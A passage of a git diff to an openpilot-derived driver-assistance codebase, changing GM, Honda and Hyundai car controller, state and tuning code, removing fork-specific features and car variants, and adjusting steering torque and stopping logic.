actuators.longControlState == LongCtrlState.stopping if not CC.longActive: # ASCM sends max regen when not enabled self.apply_gas = self.params.INACTIVE_REGEN @@ -92,6 +93,10 @@ class CarController: else: self.apply_gas = int(round(interp(actuators.accel, self.params.GAS_LOOKUP_BP, self.params.GAS_LOOKUP_V))) self.apply_brake = int(round(interp(actuators.accel, self.params.BRAKE_LOOKUP_BP, self.params.BRAKE_LOOKUP_V))) + # Don't allow any gas above inactive regen while stopping + # FIXME: brakes aren't applied immediately when enabling at a stop + if stopping: + self.apply_gas = self.params.INACTIVE_REGEN idx = (self.frame // 4) % 4 @@ -101,7 +106,7 @@ class CarController: # GM Camera exceptions # TODO: can we always check the longControlState? if self.CP.networkLocation == NetworkLocation.fwdCamera: - at_full_stop = at_full_stop and actuators.longControlState == LongCtrlState.stopping + at_full_stop = at_full_stop and stopping friction_brake_bus = CanBus.POWERTRAIN # GasRegenCmdActive needs to be 1 to avoid cruise faults. It describes the ACC state, not actuation diff --git a/selfdrive/car/gm/interface.py b/selfdrive/car/gm/interface.py index d69c26cce..e17346cfa 100755 --- a/selfdrive/car/gm/interface.py +++ b/selfdrive/car/gm/interface.py @@ -19,6 +19,12 @@ BUTTONS_DICT = {CruiseButtons.RES_ACCEL: ButtonType.accelCruise, CruiseButtons.D CruiseButtons.MAIN: ButtonType.altButton3, CruiseButtons.CANCEL: ButtonType.cancel} +NON_LINEAR_TORQUE_PARAMS = { + CAR.BOLT_EUV: [2.6531724862969748, 1.0, 0.1919764879840985, 0.009054123646805178], + CAR.ACADIA: [4.78003305, 1.0, 0.3122, 0.05591772] +} + + class CarInterface(CarInterfaceBase): @staticmethod def get_pid_accel_limits(CP, current_speed, cruise_speed): @@ -31,23 +37,14 @@ class CarInterface(CarInterfaceBase): sigmoid = desired_angle / (1 + fabs(desired_angle)) return 0.10006696 * sigmoid * (v_ego + 3.12485927) - @staticmethod - def get_steer_feedforward_acadia(desired_angle, v_ego): - desired_angle *= 0.09760208 - sigmoid = desired_angle / (1 + fabs(desired_angle)) - return 0.04689655 * sigmoid * (v_ego + 10.028217) - def get_steer_feedforward_function(self): if self.CP.carFingerprint == CAR.VOLT: return self.get_steer_feedforward_volt - elif self.CP.carFingerprint == CAR.ACADIA: - return self.get_steer_feedforward_acadia else: return CarInterfaceBase.get_steer_feedforward_default - @staticmethod - def torque_from_lateral_accel_bolt(lateral_accel_value: float, torque_params: car.CarParams.LateralTorqueTuning, - lateral_accel_error: float, lateral_accel_deadzone: float, friction_compensation: bool) -> float: + def torque_from_lateral_accel_siglin(self, lateral_accel_value: float, torque_params: car.CarParams.LateralTorqueTuning, + lateral_accel_error: float, lateral_accel_deadzone: float, friction_compensation: bool) -> float: friction = get_friction(lateral_accel_error, lateral_accel_deadzone, FRICTION_THRESHOLD, torque_params, friction_compensation) def sig(val): @@ -57,14 +54,15 @@ class CarInterface(CarInterfaceBase): # An important thing to consider is that the slope at 0 should be > 0 (ideally >1) # This has big effect on the stability about 0 (noise when going straight) # ToDo: To generalize to other GMs, explore tanh function as the nonlinear - a, b, c, _ = [2.6531724862969748, 1.0, 0.1919764879840985, 0.009054123646805178] # weights computed offline - + non_linear_torque_params = NON_LINEAR_TORQUE_PARAMS.get(self.CP.carFingerprint) + assert non_linear_torque_params, "The params are not defined" + a, b, c, _ = non_linear_torque_params steer_torque = (sig(lateral_accel_value * a) * b) + (lateral_accel_value * c) return float(steer_torque) + friction def torque_from_lateral_accel(self) -> TorqueFromLateralAccelCallbackType: - if self.CP.carFingerprint == CAR.BOLT_EUV: - return self.torque_from_lateral_accel_bolt + if self.CP.carFingerprint in NON_LINEAR_TORQUE_PARAMS: + return self.torque_from_lateral_accel_siglin else: return self.torque_from_lateral_accel_linear @@ -119,9 +117,6 @@ class CarInterface(CarInterfaceBase): ret.longitudinalTuning.kpV = [2.4, 1.5] ret.longitudinalTuning.kiV = [0.36] - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - # These cars have been put into dashcam only due to both a lack of users and test coverage. # These cars likely still work fine. Once a user confirms each car works and a test route is # added to selfdrive/car/tests/routes.py, we can remove it from this list. @@ -172,7 +167,8 @@ class CarInterface(CarInterfaceBase): ret.wheelbase = 2.86 ret.steerRatio = 14.4 # end to end is 13.46 ret.centerToFront = ret.wheelbase * 0.4 - ret.lateralTuning.pid.kf = 1. # get_steer_feedforward_acadia() + ret.steerActuatorDelay = 0.2 + CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning) elif candidate == CAR.BUICK_LACROSSE: ret.mass = 1712. + STD_CARGO_KG diff --git a/selfdrive/car/honda/carcontroller.py b/selfdrive/car/honda/carcontroller.py index fd5fa3759..347c16c86 100644 --- a/selfdrive/car/honda/carcontroller.py +++ b/selfdrive/car/honda/carcontroller.py @@ -6,7 +6,7 @@ from common.realtime import DT_CTRL from opendbc.can.packer import CANPacker from selfdrive.car import create_gas_interceptor_command from selfdrive.car.honda import hondacan -from selfdrive.car.honda.values import CruiseButtons, VISUAL_HUD, HONDA_BOSCH, HONDA_BOSCH_RADARLESS, HONDA_NIDEC_ALT_PCM_ACCEL, CarControllerParams, CAR +from selfdrive.car.honda.values import CruiseButtons, VISUAL_HUD, HONDA_BOSCH, HONDA_BOSCH_RADARLESS, HONDA_NIDEC_ALT_PCM_ACCEL, CarControllerParams from selfdrive.controls.lib.drive_helpers import rate_limit VisualAlert = car.CarControl.HUDControl.VisualAlert @@ -124,7 +124,7 @@ class CarController: self.brake = 0.0 self.last_steer = 0.0 - def update(self, CC, CS, now_nanos, dragonconf): + def update(self, CC, CS, now_nanos): actuators = CC.actuators hud_control = CC.hudControl conversion = hondacan.get_cruise_speed_conversion(self.CP.carFingerprint, CS.is_metric) @@ -206,10 +206,7 @@ class CarController: if pcm_cancel_cmd: can_sends.append(hondacan.spam_buttons_command(self.packer, CruiseButtons.CANCEL, self.CP.carFingerprint)) elif CC.cruiseControl.resume: - if CS.CP.carFingerprint in (CAR.CIVIC_BOSCH, CAR.CRV_HYBRID_BSM) and CS.hud_lead == 1: - can_sends.append(hondacan.spam_buttons_command(self.packer, CruiseButtons.RES_ACCEL, CS.CP.carFingerprint)) - else: - can_sends.append(hondacan.spam_buttons_command(self.packer, CruiseButtons.RES_ACCEL, self.CP.carFingerprint)) + can_sends.append(hondacan.spam_buttons_command(self.packer, CruiseButtons.RES_ACCEL, self.CP.carFingerprint)) else: # Send gas and brake commands. @@ -228,8 +225,6 @@ class CarController: apply_brake = clip(self.brake_last - wind_brake, 0.0, 1.0) apply_brake = int(clip(apply_brake * self.params.NIDEC_BRAKE_MAX, 0, self.params.NIDEC_BRAKE_MAX - 1)) pump_on, self.last_pump_ts = brake_pump_hysteresis(apply_brake, self.apply_brake_last, self.last_pump_ts, ts) - if self.CP.carFingerprint == CAR.ODYSSEY_HYBRID: - pump_on = apply_brake > 0 pcm_override = True can_sends.append(hondacan.create_brake_command(self.packer, apply_brake, pump_on, diff --git a/selfdrive/car/honda/carstate.py b/selfdrive/car/honda/carstate.py index b6db47069..35d627990 100644 --- a/selfdrive/car/honda/carstate.py +++ b/selfdrive/car/honda/carstate.py @@ -42,9 +42,6 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): ("CRUISE_SETTING", "SCM_BUTTONS"), ("ACC_STATUS", "POWERTRAIN_DATA"), ("MAIN_ON", main_on_sig_msg), - #dp - ("ENGINE_RPM", "POWERTRAIN_DATA"), - ("HUD_LEAD", "ACC_HUD"), ] checks = [ @@ -60,7 +57,7 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): ("STEER_MOTOR_TORQUE", 0), # TODO: not on every car ] - if CP.carFingerprint in (CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID): + if CP.carFingerprint == CAR.ODYSSEY_CHN: checks += [ ("SCM_FEEDBACK", 25), ("SCM_BUTTONS", 50), @@ -71,7 +68,7 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): ("SCM_BUTTONS", 25), ] - if CP.carFingerprint in (CAR.CRV_HYBRID, CAR.CIVIC_BOSCH_DIESEL, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CRV_HYBRID_BSM): + if CP.carFingerprint in (CAR.CRV_HYBRID, CAR.CIVIC_BOSCH_DIESEL, CAR.ACURA_RDX_3G, CAR.HONDA_E): checks.append((gearbox_msg, 50)) else: checks.append((gearbox_msg, 100)) @@ -80,7 +77,7 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): signals.append(("BRAKE_PRESSED", "BRAKE_MODULE")) checks.append(("BRAKE_MODULE", 50)) - if CP.carFingerprint in (HONDA_BOSCH | {CAR.CIVIC, CAR.ODYSSEY, CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID}): + if CP.carFingerprint in (HONDA_BOSCH | {CAR.CIVIC, CAR.ODYSSEY, CAR.ODYSSEY_CHN}): signals.append(("EPB_STATE", "EPB_STATUS")) checks.append(("EPB_STATUS", 50)) @@ -92,8 +89,6 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): ("CRUISE_SPEED", "ACC_HUD"), ("ACCEL_COMMAND", "ACC_CONTROL"), ("AEB_STATUS", "ACC_CONTROL"), - #dp - ("BRAKE_LIGHTS", "ACC_CONTROL"), ] checks += [ ("ACC_HUD", 10), @@ -103,12 +98,12 @@ def get_can_signals(CP, gearbox_msg, main_on_sig_msg): signals += [("CRUISE_SPEED_PCM", "CRUISE"), ("CRUISE_SPEED_OFFSET", "CRUISE_PARAMS")] - if CP.carFingerprint in (CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID): + if CP.carFingerprint == CAR.ODYSSEY_CHN: checks.append(("CRUISE_PARAMS", 10)) else: checks.append(("CRUISE_PARAMS", 50)) - if CP.carFingerprint in (CAR.ACCORD, CAR.ACCORDH, CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL, CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G, CAR.CRV_HYBRID_BSM): + if CP.carFingerprint in (CAR.ACCORD, CAR.ACCORDH, CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL, CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G): signals.append(("DRIVERS_DOOR_OPEN", "SCM_FEEDBACK")) elif CP.carFingerprint in (CAR.ODYSSEY_CHN, CAR.FREED, CAR.HRV): signals.append(("DRIVERS_DOOR_OPEN", "SCM_BUTTONS")) @@ -157,8 +152,6 @@ class CarState(CarStateBase): self.brake_switch_active = False self.cruise_setting = 0 self.v_cruise_pcm_prev = 0 - self.engineRpm = 0 - self.hud_lead = 0 # When available we use cp.vl["CAR_SPEED"]["ROUGH_CAR_SPEED_2"] to populate vEgoCluster # However, on cars without a digital speedometer this is not always present (HRV, FIT, CRV 2016, ILX and RDX) @@ -185,7 +178,7 @@ class CarState(CarStateBase): # panda checks if the signal is non-zero ret.standstill = cp.vl["ENGINE_DATA"]["XMISSION_SPEED"] < 1e-5 # TODO: find a common signal across all cars - if self.CP.carFingerprint in (CAR.ACCORD, CAR.ACCORDH, CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL, CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G, CAR.CRV_HYBRID_BSM): + if self.CP.carFingerprint in (CAR.ACCORD, CAR.ACCORDH, CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL, CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G): ret.doorOpen = bool(cp.vl["SCM_FEEDBACK"]["DRIVERS_DOOR_OPEN"]) elif self.CP.carFingerprint in (CAR.ODYSSEY_CHN, CAR.FREED, CAR.HRV): ret.doorOpen = bool(cp.vl["SCM_BUTTONS"]["DRIVERS_DOOR_OPEN"]) @@ -238,11 +231,9 @@ class CarState(CarStateBase): ret.leftBlinker, ret.rightBlinker = self.update_blinker_from_stalk( 250, cp.vl["SCM_FEEDBACK"]["LEFT_BLINKER"], cp.vl["SCM_FEEDBACK"]["RIGHT_BLINKER"]) ret.brakeHoldActive = cp.vl["VSA_STATUS"]["BRAKE_HOLD_ACTIVE"] == 1 - #dp - self.engineRpm = cp.vl["POWERTRAIN_DATA"]['ENGINE_RPM'] # TODO: set for all cars - if self.CP.carFingerprint in (HONDA_BOSCH | {CAR.CIVIC, CAR.ODYSSEY, CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID}): + if self.CP.carFingerprint in (HONDA_BOSCH | {CAR.CIVIC, CAR.ODYSSEY, CAR.ODYSSEY_CHN}): ret.parkingBrake = cp.vl["EPB_STATUS"]["EPB_STATE"] != 0 gear = int(cp.vl[self.gearbox_msg]["GEAR_SHIFTER"]) @@ -293,21 +284,11 @@ class CarState(CarStateBase): ret.cruiseState.enabled = cp.vl["POWERTRAIN_DATA"]["ACC_STATUS"] != 0 ret.cruiseState.available = bool(cp.vl[self.main_on_sig_msg]["MAIN_ON"]) - # afa feature - self.hud_lead = cp.vl["ACC_HUD"]['HUD_LEAD'] - # Gets rid of Pedal Grinding noise when brake is pressed at slow speeds for some models if self.CP.carFingerprint in (CAR.PILOT, CAR.RIDGELINE): if ret.brake > 0.1: ret.brakePressed = True - if self.CP.carFingerprint in HONDA_BOSCH and self.CP.carFingerprint not in HONDA_BOSCH_RADARLESS: - ret.brakeLightsDEPRECATED = bool(ret.brakePressed or ret.brake > 0.4 or ret.parkingBrake) - if not self.CP.openpilotLongitudinalControl: - ret.brakeLightsDEPRECATED = ret.brakeLightsDEPRECATED or cp.vl["ACC_CONTROL"]['BRAKE_LIGHTS'] != 0 - else: - ret.brakeLightsDEPRECATED = bool(ret.brakePressed) - if self.CP.carFingerprint in HONDA_BOSCH: # TODO: find the radarless AEB_STATUS bit and make sure ACCEL_COMMAND is correct to enable AEB alerts if self.CP.carFingerprint not in HONDA_BOSCH_RADARLESS: @@ -324,7 +305,7 @@ class CarState(CarStateBase): if self.CP.carFingerprint in HONDA_BOSCH_RADARLESS: self.lkas_hud = cp_cam.vl["LKAS_HUD"] - if self.CP.enableBsm and self.CP.carFingerprint in (CAR.CRV_5G, CAR.CRV_HYBRID_BSM,): + if self.CP.enableBsm: # BSM messages are on B-CAN, requires a panda forwarding B-CAN messages to CAN 0 # more info here: https://github.com/commaai/openpilot/pull/1867 ret.leftBlindspot = cp_body.vl["BSM_STATUS_LEFT"]["BSM_ALERT"] == 1 @@ -374,7 +355,7 @@ class CarState(CarStateBase): @staticmethod def get_body_can_parser(CP): - if CP.enableBsm and CP.carFingerprint in (CAR.CRV_5G, CAR.CRV_HYBRID_BSM,): + if CP.enableBsm: signals = [("BSM_ALERT", "BSM_STATUS_RIGHT"), ("BSM_ALERT", "BSM_STATUS_LEFT")] diff --git a/selfdrive/car/honda/hondacan.py b/selfdrive/car/honda/hondacan.py index c8ceee7fd..1fe0a1376 100644 --- a/selfdrive/car/honda/hondacan.py +++ b/selfdrive/car/honda/hondacan.py @@ -130,11 +130,10 @@ def create_ui_commands(packer, CP, enabled, pcm_speed, hud, is_metric, acc_hud, 'IMPERIAL_UNIT': int(not is_metric), 'HUD_LEAD': 2 if enabled and hud.lead_visible else 1 if enabled else 0, 'SET_ME_X01_2': 1, - 'ACC_ON': int(enabled), } if CP.carFingerprint in HONDA_BOSCH: - # acc_hud_values['ACC_ON'] = int(enabled) + acc_hud_values['ACC_ON'] = int(enabled) acc_hud_values['FCM_OFF'] = 1 acc_hud_values['FCM_OFF_2'] = 1 else: diff --git a/selfdrive/car/honda/interface.py b/selfdrive/car/honda/interface.py index 6837558bf..11eff61b3 100755 --- a/selfdrive/car/honda/interface.py +++ b/selfdrive/car/honda/interface.py @@ -7,7 +7,6 @@ from selfdrive.car.honda.values import CarControllerParams, CruiseButtons, Honda from selfdrive.car import STD_CARGO_KG, CivicParams, create_button_event, scale_tire_stiffness, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase from selfdrive.car.disable_ecu import disable_ecu -from common.params import Params ButtonType = car.CarState.ButtonEvent.Type @@ -51,15 +50,7 @@ class CarInterface(CarInterfaceBase): ret.pcmCruise = not ret.enableGasInterceptor - # dp - attempt to disable op long - params = Params() - if int(params.get("dp_atl").decode('utf-8')) == 1: - ret.openpilotLongitudinalControl = False - # update pcmCruise again - if candidate in HONDA_BOSCH: - ret.pcmCruise = True - - if candidate in (CAR.CRV_5G, CAR.CRV_HYBRID_BSM): + if candidate == CAR.CRV_5G: ret.enableBsm = 0x12f8bfa7 in fingerprint[0] # Detect Bosch cars with new HUD msgs @@ -173,7 +164,7 @@ class CarInterface(CarInterfaceBase): tire_stiffness_factor = 0.677 ret.wheelSpeedFactor = 1.025 - elif candidate in (CAR.CRV_HYBRID, CAR.CRV_HYBRID_BSM): + elif candidate == CAR.CRV_HYBRID: ret.mass = 1667. + STD_CARGO_KG # mean of 4 models in kg ret.wheelbase = 2.66 ret.centerToFront = ret.wheelbase * 0.41 @@ -233,14 +224,14 @@ class CarInterface(CarInterfaceBase): ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.06]] tire_stiffness_factor = 0.677 - elif candidate in (CAR.ODYSSEY, CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID): + elif candidate in (CAR.ODYSSEY, CAR.ODYSSEY_CHN): ret.mass = 1900. + STD_CARGO_KG ret.wheelbase = 3.00 ret.centerToFront = ret.wheelbase * 0.41 ret.steerRatio = 14.35 # as spec tire_stiffness_factor = 0.82 ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]] - if candidate in (CAR.ODYSSEY_CHN, CAR.ODYSSEY_HYBRID): + if candidate == CAR.ODYSSEY_CHN: ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 32767], [0, 32767]] # TODO: determine if there is a dead zone at the top end else: ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end @@ -301,7 +292,7 @@ class CarInterface(CarInterfaceBase): # min speed to enable ACC. if car can do stop and go, then set enabling speed # to a negative value, so it won't matter. Otherwise, add 0.5 mph margin to not # conflict with PCM acc - ret.autoResumeSng = candidate in (HONDA_BOSCH | {CAR.CIVIC, CAR.ODYSSEY_HYBRID}) or ret.enableGasInterceptor + ret.autoResumeSng = candidate in (HONDA_BOSCH | {CAR.CIVIC}) or ret.enableGasInterceptor ret.minEnableSpeed = -1. if ret.autoResumeSng else 25.5 * CV.MPH_TO_MS # TODO: start from empirically derived lateral slip stiffness for the civic and scale by @@ -312,26 +303,6 @@ class CarInterface(CarInterfaceBase): ret.steerActuatorDelay = 0.1 ret.steerLimitTimer = 0.8 - params.put("dp_lateral_steer_rate_cost", "0.5") - if params.get_bool('dp_honda_eps_mod'): - if candidate == CAR.CIVIC: - # tuned by a-tao - ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096, 8000], [0, 4096, 4096]] - elif candidate in (CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL): - ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2564, 8000], [0, 2564, 3840]] - ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.09]] #2.5 default mod #Tuned by TMG - elif candidate in (CAR.ACCORD, CAR.ACCORDH): - ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.09]] - elif candidate == CAR.CRV_5G: - ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 10000], [0, 2560, 3840]] #tuned by Titanminer (8000) - ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.21], [0.07]] - elif candidate in (CAR.CRV_HYBRID, CAR.CRV_HYBRID_BSM): - ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0x0, 0xB5, 0x161, 0x2D6, 0x4C0, 0x70D, 0xC42, 0x1058, 0x2C00], [0x0, 0x160, 0x1F0, 0x2E0, 0x378, 0x4A0, 0x5F0, 0x804, 0xF00]] - ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.21], [0.07]] #still needs to finish tuning for the new car - ret.lateralTuning.pid.kf = 0.00004 - - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) return ret @staticmethod @@ -343,9 +314,6 @@ class CarInterface(CarInterfaceBase): def _update(self, c): ret = self.CS.update(self.cp, self.cp_cam, self.cp_body) - #dp - ret.engineRpm = self.CS.engineRpm - buttonEvents = [] if self.CS.cruise_buttons != self.CS.prev_cruise_buttons: @@ -358,8 +326,6 @@ class CarInterface(CarInterfaceBase): # events events = self.create_common_events(ret, pcm_enable=False) - #events = self.dp_atl_warning(ret, events) - if self.CP.pcmCruise and ret.vEgo < self.CP.minEnableSpeed: events.add(EventName.belowEngageSpeed) @@ -385,4 +351,4 @@ class CarInterface(CarInterfaceBase): # pass in a car.CarControl # to be called @ 100hz def apply(self, c, now_nanos): - return self.CC.update(c, self.CS, now_nanos, self.dragonconf) + return self.CC.update(c, self.CS, now_nanos) diff --git a/selfdrive/car/honda/values.py b/selfdrive/car/honda/values.py index f2c49ac98..ba7a42d2a 100644 --- a/selfdrive/car/honda/values.py +++ b/selfdrive/car/honda/values.py @@ -84,14 +84,12 @@ class CAR: CRV_5G = "HONDA CR-V 2017" CRV_EU = "HONDA CR-V EU 2016" CRV_HYBRID = "HONDA CR-V HYBRID 2019" - CRV_HYBRID_BSM = "HONDA CR-V HYBRID 2019 w/ BSM" FIT = "HONDA FIT 2018" FREED = "HONDA FREED 2020" HRV = "HONDA HRV 2019" HRV_3G = "HONDA HR-V 2023" ODYSSEY = "HONDA ODYSSEY 2018" ODYSSEY_CHN = "HONDA ODYSSEY CHN 2019" - ODYSSEY_HYBRID = "HONDA ODYSSEY HYBRID CHN 2022" ACURA_RDX = "ACURA RDX 2018" ACURA_RDX_3G = "ACURA RDX 2020" PILOT = "HONDA PILOT 2017" @@ -144,7 +142,6 @@ CAR_INFO: Dict[str, Optional[Union[HondaCarInfo, List[HondaCarInfo]]]] = { CAR.HRV_3G: HondaCarInfo("Honda HR-V 2023", "All"), CAR.ODYSSEY: HondaCarInfo("Honda Odyssey 2018-20"), CAR.ODYSSEY_CHN: None, # Chinese version of Odyssey - CAR.ODYSSEY_HYBRID: HondaCarInfo("Honda Odyssey hybrid china 2022", min_steer_speed=0. * CV.MPH_TO_MS), CAR.ACURA_RDX: HondaCarInfo("Acura RDX 2016-18", "AcuraWatch Plus", min_steer_speed=12. * CV.MPH_TO_MS), CAR.ACURA_RDX_3G: HondaCarInfo("Acura RDX 2019-22", "All", min_steer_speed=3. * CV.MPH_TO_MS), CAR.PILOT: [ @@ -201,8 +198,6 @@ FW_QUERY_CONFIG = FwQueryConfig( ) FW_VERSIONS = { - CAR.CRV_HYBRID_BSM: {(Ecu.vsa, 0xfff, None): [b'\x00']}, - CAR.ODYSSEY_HYBRID: {(Ecu.vsa, 0xfff, None): [b'\x00']}, CAR.ACCORD: { (Ecu.programmedFuelInjection, 0x18da10f1, None): [ b'37805-6A0-8720\x00\x00', @@ -1574,14 +1569,12 @@ DBC = { CAR.CRV_5G: dbc_dict('honda_crv_ex_2017_can_generated', None, body_dbc='honda_crv_ex_2017_body_generated'), CAR.CRV_EU: dbc_dict('honda_crv_executive_2016_can_generated', 'acura_ilx_2016_nidec'), CAR.CRV_HYBRID: dbc_dict('honda_accord_2018_can_generated', None), - CAR.CRV_HYBRID_BSM: dbc_dict('honda_accord_2018_can_generated', None, body_dbc='honda_crv_ex_2017_body_generated'), CAR.FIT: dbc_dict('honda_fit_ex_2018_can_generated', 'acura_ilx_2016_nidec'), CAR.FREED: dbc_dict('honda_fit_ex_2018_can_generated', 'acura_ilx_2016_nidec'), CAR.HRV: dbc_dict('honda_fit_ex_2018_can_generated', 'acura_ilx_2016_nidec'), CAR.HRV_3G: dbc_dict('honda_civic_ex_2022_can_generated', None), CAR.ODYSSEY: dbc_dict('honda_odyssey_exl_2018_generated', 'acura_ilx_2016_nidec'), CAR.ODYSSEY_CHN: dbc_dict('honda_odyssey_extreme_edition_2018_china_can_generated', 'acura_ilx_2016_nidec'), - CAR.ODYSSEY_HYBRID: dbc_dict('honda_odyssey_hybrid_2022_china_can_generated', 'acura_ilx_2016_nidec'), CAR.PILOT: dbc_dict('acura_ilx_2016_can_generated', 'acura_ilx_2016_nidec'), CAR.RIDGELINE: dbc_dict('acura_ilx_2016_can_generated', 'acura_ilx_2016_nidec'), CAR.INSIGHT: dbc_dict('honda_insight_ex_2019_can_generated', None), @@ -1597,8 +1590,8 @@ STEER_THRESHOLD = { HONDA_NIDEC_ALT_PCM_ACCEL = {CAR.ODYSSEY} HONDA_NIDEC_ALT_SCM_MESSAGES = {CAR.ACURA_ILX, CAR.ACURA_RDX, CAR.CRV, CAR.CRV_EU, CAR.FIT, CAR.FREED, CAR.HRV, CAR.ODYSSEY_CHN, - CAR.ODYSSEY_HYBRID, CAR.PILOT, CAR.RIDGELINE} + CAR.PILOT, CAR.RIDGELINE} HONDA_BOSCH = {CAR.ACCORD, CAR.ACCORDH, CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL, CAR.CRV_5G, - CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G, CAR.CRV_HYBRID_BSM} + CAR.CRV_HYBRID, CAR.INSIGHT, CAR.ACURA_RDX_3G, CAR.HONDA_E, CAR.CIVIC_2022, CAR.HRV_3G} HONDA_BOSCH_ALT_BRAKE_SIGNAL = {CAR.ACCORD, CAR.CRV_5G, CAR.ACURA_RDX_3G, CAR.HRV_3G} HONDA_BOSCH_RADARLESS = {CAR.CIVIC_2022, CAR.HRV_3G} diff --git a/selfdrive/car/hyundai/carcontroller.py b/selfdrive/car/hyundai/carcontroller.py index b7d7d5543..b07522ed2 100644 --- a/selfdrive/car/hyundai/carcontroller.py +++ b/selfdrive/car/hyundai/carcontroller.py @@ -61,8 +61,12 @@ class CarController: hud_control = CC.hudControl # steering torque + # rick - from taco + self.params = CarControllerParams(self.CP, CS.out.vEgoRaw) new_steer = int(round(actuators.steer * self.params.STEER_MAX)) apply_steer = apply_driver_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, self.params) + # rick - from taco + apply_steer = clip(apply_steer, -self.params.STEER_MAX, self.params.STEER_MAX) if not CC.latActive: apply_steer = 0 @@ -114,7 +118,7 @@ class CarController: hda2_long = hda2 and self.CP.openpilotLongitudinalControl # steering control - can_sends.extend(hyundaicanfd.create_steering_messages(self.packer, self.CP, self.CAN, CC.latActive, lat_active, apply_steer)) + can_sends.extend(hyundaicanfd.create_steering_messages(self.packer, self.CP, self.CAN, CC.enabled, lat_active, apply_steer)) # disable LFA on HDA2 if self.frame % 5 == 0 and hda2: @@ -122,7 +126,7 @@ class CarController: # LFA and HDA icons if self.frame % 5 == 0 and (not hda2 or hda2_long): - can_sends.append(hyundaicanfd.create_lfahda_cluster(self.packer, self.CAN, CC.latActive)) + can_sends.append(hyundaicanfd.create_lfahda_cluster(self.packer, self.CAN, CC.enabled)) # blinkers if hda2 and self.CP.flags & HyundaiFlags.ENABLE_BLINKERS: @@ -141,7 +145,7 @@ class CarController: # cruise cancel if CC.cruiseControl.cancel: if self.CP.flags & HyundaiFlags.CANFD_ALT_BUTTONS: - can_sends.append(hyundaicanfd.create_acc_cancel(self.packer, self.CAN, CS.cruise_info)) + can_sends.append(hyundaicanfd.create_acc_cancel(self.packer, self.CP, self.CAN, CS.cruise_info)) self.last_button_frame = self.frame else: for _ in range(20): @@ -159,7 +163,7 @@ class CarController: self.last_button_frame = self.frame else: can_sends.append(hyundaican.create_lkas11(self.packer, self.frame, self.car_fingerprint, apply_steer, lat_active, - torque_fault, CS.lkas11, sys_warning, sys_state, CC.latActive, + torque_fault, CS.lkas11, sys_warning, sys_state, CC.enabled, hud_control.leftLaneVisible, hud_control.rightLaneVisible, left_lane_warning, right_lane_warning)) diff --git a/selfdrive/car/hyundai/carstate.py b/selfdrive/car/hyundai/carstate.py index 32972b94b..32e2f8626 100644 --- a/selfdrive/car/hyundai/carstate.py +++ b/selfdrive/car/hyundai/carstate.py @@ -89,8 +89,6 @@ class CarState(CarStateBase): 50, cp.vl["CGW1"]["CF_Gway_TurnSigLh"], cp.vl["CGW1"]["CF_Gway_TurnSigRh"]) ret.steeringTorque = cp.vl["MDPS12"]["CR_Mdps_StrColTq"] ret.steeringTorqueEps = cp.vl["MDPS12"]["CR_Mdps_OutTq"] - #dp - ret.engineRpm = cp.vl["TCU_DCT13"]['Cluster_Engine_RPM'] ret.steeringPressed = self.update_steering_pressed(abs(ret.steeringTorque) > self.params.STEER_THRESHOLD, 5) ret.steerFaultTemporary = cp.vl["MDPS12"]["CF_Mdps_ToiUnavail"] != 0 or cp.vl["MDPS12"]["CF_Mdps_ToiFlt"] != 0 @@ -112,8 +110,6 @@ class CarState(CarStateBase): ret.brakeHoldActive = cp.vl["TCS15"]["AVH_LAMP"] == 2 # 0 OFF, 1 ERROR, 2 ACTIVE, 3 READY ret.parkingBrake = cp.vl["TCS13"]["PBRAKE_ACT"] == 1 ret.accFaulted = 